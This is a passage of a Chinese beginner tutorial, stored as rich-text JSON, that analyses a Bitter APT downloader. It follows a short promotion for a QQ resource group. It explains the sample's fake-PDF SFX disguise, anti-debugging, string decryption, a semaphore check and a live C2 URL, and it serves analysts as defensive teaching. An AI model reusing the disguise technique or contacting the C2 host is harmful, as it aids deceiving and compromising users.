align":null,"origin":null},"content":[{"type":"text","text":"乾貨主要有:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"① 2000多本網安必看電子書(主流和經典的書籍應該都有了)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"② PHP標準庫資料(最全中文版)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"③ 項目源碼(四五十個有趣且經典的練手項目及源碼)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"④ 網絡安全基礎入門、Linux運維,web安全、滲透測試方面的視頻(適合小白學習)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"⑤ 網絡安全學習路線圖(告別不入流的學習)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"各位朋友們可以關注+評論一波 然後加下","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"QQ羣:581499282","attrs":{}},{"type":"text","text":" 備註:Infoq 即可免費獲取全部資料","attrs":{}}]}]}
(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析
{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"分析到一個簡單又經典的樣本,想想最近比較無聊就好好寫寫APT分析的部分吧!","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"本文僅從樣本分析角度出發,樣本來源以及溯源部分就不多囉嗦了(寫了但是太長了,一起發閱讀性很差就不發了,而且也不是很有代表性,以後有機會發個別的。)","attrs":{}}]}],"attrs":{}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"初始載荷信息","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"攻擊的初始載荷是一個文件名爲雙後綴名的文件“開證裝期郵件.pdf.exe”,這是一種常見的文件僞裝方式,利用Windows的擴展名顯示設置(“隱藏已知文件類型的擴展名”)僞裝真實的.exe後綴,再選擇高級自解壓選項中自定義自解壓文件圖標,選擇讓exe文件看起來像PDF文檔,誘騙用戶打開。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"不過由於自解壓格式的圖標來源於文件,而不是系統自帶的圖標:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/fc/fc8897506ed768e38bb780c46579642c.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"時常出現畫風不同的C位出道場面(一看就是自帶劇本的):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/bd/bd5e6d500bb237f9958c97ff1dc95244.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/5b/5b377f843db9c43798c9ecc41d735571.gif","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"VT搜索該文件MD5可以看到有52/69的高檢測率,匹配的YARA規則名可以解釋爲隱藏爲PDF的SFX自解壓文件:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/04/047d51fef6ff012fb4bc15cf645dcf4f.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"SFX自解壓文件,是一種壓縮軟件生成的exe文件,擁有執行後可以解壓釋放文件並執行的特性,通常被病毒文件用來捆綁掩飾文檔或其他白文件進行僞裝。可將文件後綴改爲rar,使用壓縮軟件打開,查看其中的文件和相關代碼和解壓,或者在文件屬性的註釋中也可以看到。如本文中的樣本運行後會在“C:\\intel\\logs”路徑下釋放“dlhost.exe”並執行:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/31/31fdaa6e1caf4b457c7def98cb2ca36c.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"直接雙擊運行exe使初始載荷在指定路徑下釋放文件也行,多一個步驟要找一下文件。一般來說解壓比較方便,但是有些樣本會檢測是否在設置的目錄下運行,不是則退出,分析時需注意這一點(本文樣本無此檢測)。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"有效載荷dlhost.exe","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"結論先行,帶入結論看內容比較容易看進去。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"“dlhost.exe”經過分析後發現爲APT組織蔓靈花常用的下載器,用來收集受害者計算機信息和創建套接字通信,從遠程服務器下載插件完成其他功能的操作。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"在分析之前,建議先做一些準備工作,磨刀不誤砍柴工~","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"去除隨機基址","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"由於PE的特性,程序有基址隨機化的問題,那麼在分析前,需要查看並修改爲不隨機的情況,便於下斷點分析後調試的配置文件(.udd)在重新運行後還能生效。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"方式有多種,比較簡單的是使用010Editor查看PE文件,將在PE結構中有字段“(NtHeader→OptionalHeader→DllCharacteristics→)IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE”,如果數值爲1,即開啓了“基址重定位”(動態隨機基址),現將其修改爲0後保存文件:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/31/3140f74293e1d9fb85f1efb03278ddd2.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"也可以自己寫腳本或者可執行程序將其修改。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"查看斷點","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"如果沒有特地隱藏或者處理要使用的函數的情況(可“一般”是有的),查看IDA的導入表窗口中顯示的函數,可以推測出一些功能,發現有:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"1.套接字通信的函數,那麼存在套接字通信(好繞):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/2c/2c8b40f73c8020a0c33bf39c082e599c.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"2.文件操作函數,包括創建/打開、讀取和寫入等。可以推測有創建文件、讀取文件、移動文件等操作:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/e9/e9425db05aa69e8ef43e0c2bc1672174.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"3.獲取信息操作:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/8c/8c4e7d4d615cf55d9eccf4684ffa653f.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"那麼此時可以通過導入表有個初步的判斷,這是一個有獲取計算機和用戶信息,並且有文件操作的聯網惡意軟件——基本上已經可以推測出這是下載器或文件竊取器了。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"反調試","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"一般來說惡意軟件都會有反調試功能,反調試的方向也分多類,如:探測Windows調試器、識別調試器行爲、干擾調試器的功能等。在《惡意代碼分析實戰》第16章反調試技術、《逆向工程核心原理》第51章靜態反調試技術&第52章動態反調試技術都有詳細介紹,一般工作中遇到“Sleep”和“IsDebuggerPresent”比較多。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"本樣本雖無干擾調試的“Sleep”,但有檢測調試環境的“IsDebuggerPresent”,問題不大,“15PB OD”的插件大禮包中“Hide Debugger”已將該函數的返回值HOOK,即反反調試(狗頭):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/ae/ae6fbc0e3ef099e018a76a8c9b6d220d.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"對API下斷並檢查","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"將樣本拖入OD後,對敏感API函數下斷,如:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"套接字通信中發送數據的“send”; 文件操作的“CreateFileW”、“ReadFile”和“WriteFile”; 用於執行惡意載荷或命令的“ShellExecuteA”等。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"接着可以“Alt+B”或菜單欄下的“B”(Break,斷點之意),查看已下的斷點,想取消斷點時從這裏也可以快速的找到:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/c9/c91c047e83c223c1a2b1e11e1f6795ec.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"查看後“Alt+C”或菜單欄下的“C”,可返回反彙編窗口。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"查看函數調用","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"返回後可以使用右鍵“查找”功能中的“所有模塊間的調用”,查看有無異常情況(那當然是有的):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/95/9599ffaf4519654c8ec999137dc18bf6.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"大事不妙!異常就是大量調用動態獲取函數地址的“GetModuleHandleW”+“GetProcAddress”,這是一種常見的規避檢測的方式,並且也是一種反靜態分析手段:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/da/dae06710b9542f4db712dbae5aea4ec2.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"在IDA處找到對應的函數或代碼後,使用IDA的腳本功能(Shift+F2):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/01/011af0f9134a1a5e72ca99475af64854.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"使用IDA的重命名函數“MakeNameEX”編寫的命令“MakeNameEx(long ea, string name, long flags);”。可以用Notepad++/Excel等編輯工具或Python/BAT腳本,將命令批量化處理後如下,複製粘貼後RUN:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/cf/cf62fb43aff298b18a79e3e65af94fe5.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"將地址進行重命名,便於靜態分析:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d4/d4f8ee35fda6463d233d244557b8e26d.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"出現個別因爲已有該名稱所以衝突不能重命名的,單獨重命名(N鍵)一下即可:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/64/6403ed5d25e5d375161dccf0895635c8.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"調試運行","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"IDA導出表可以查看到主函數“Start”地址,下斷後F9可直接運行到斷點處,進行調試分析。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"解密操作","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"在IDA界面還可以發現比較重要的功能代碼在函數401C80處,其中有大量的if+Do While循環解密(解密方式-= 0xD),問題不大,在解密函數完成後的那行代碼下斷:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d7/d7eb01830e9777270a0d8fc1ba4731b2.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"此處建議看看解密出的內存都是什麼數據,如果發現特殊的字符串或數據需要特地跟蹤一下。比如此樣本中解密的部分數據就很明顯包括註冊表路徑、外連的URL字符串、和一串疑似指令的字符串“Yes file”。這其實就是解密出了配置文件:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/02/02135e46d9c3bc9c211066b28cb4d2b7.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"環境檢測","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"如上上圖所示,解密後就調用“CreateSemaphoreA”創建信號量“7t56yr54r”,接着調用“GetLastError”檢測信號量是否創建成功,如果錯誤碼爲定義“ERROR_ALREADY_EXISTS”的183(0xB7),即代表內存中已存在運行中的該進程,那麼其後續的函數40C234必然是退出進程函數(或者有可能進入擾亂分析或者僞裝功能的代碼):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d8/d833683daf9322ee66889d80d34d3955.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"通常惡意的可執行文件會通過CreateMutex創建互斥體或CreateSemaphore創建信號量(蔓靈花該下載器都是用信號量)+“GetLastError”獲取錯誤碼的方式讓惡意進程在內存中保持唯一運行的狀態,避免互相干擾。","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"那麼由此可以逆推,其實主要的功能代碼,一般是在判斷完互斥體或信號量後的部分","attrs":{}},{"type":"text","text":"(或者其他檢測行爲後)。時間比較緊迫的情況,可以考慮定位到檢測+“GetLastError”後,“if”判斷不成立的邏輯條件進行分析。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"由於本人調試分析時,常利用火絨劍等監測工具監測後臺運行的該進程,故“GetLastError”的返回值爲0xB7,此步可以通過修改寄存器的ZF標誌位跳過此步跳轉:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/69/69b248aa0ef3b21b1d1f8c6c071ed639.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"網絡行爲","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"初始化操作和解密操作等非惡意功能代碼比較多,先用IDA找比較重要的函數分析,再用OD按F4到CALL行查看其傳入的參數,如外連“http://162.0.229.203/RguhsT/RguhsT/”:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/f2/f20f5fa228c740450eaadfac8f1ca1f8.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"由於分析時大部分情況是不建議聯網的,且有可能外連的域名或IP已失效,在套接字